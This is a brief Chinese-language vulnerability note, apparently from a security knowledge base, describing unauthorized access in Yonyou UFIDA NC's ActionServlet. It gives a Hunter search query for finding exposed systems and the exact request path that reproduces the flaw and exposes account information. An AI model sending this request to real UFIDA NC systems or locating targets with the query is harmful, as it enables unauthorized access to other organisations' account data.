登录 白背景
源码

用友UFIDA NC com.ufida.web.action.ActionServlet 未授权访问

一、漏洞简介

用友UFIDA NC com.ufida.web.action.ActionServlet 未授权访问,攻击者可通过此漏洞获取账户信息。

二、影响版本

  • 用友UFIDA NC

三、资产测绘

  • hunterapp.name="用友 UFIDA NC"
  • 特征

image.png

四、漏洞复现

/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeedID=&TableedID=

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gp519otduqft67dh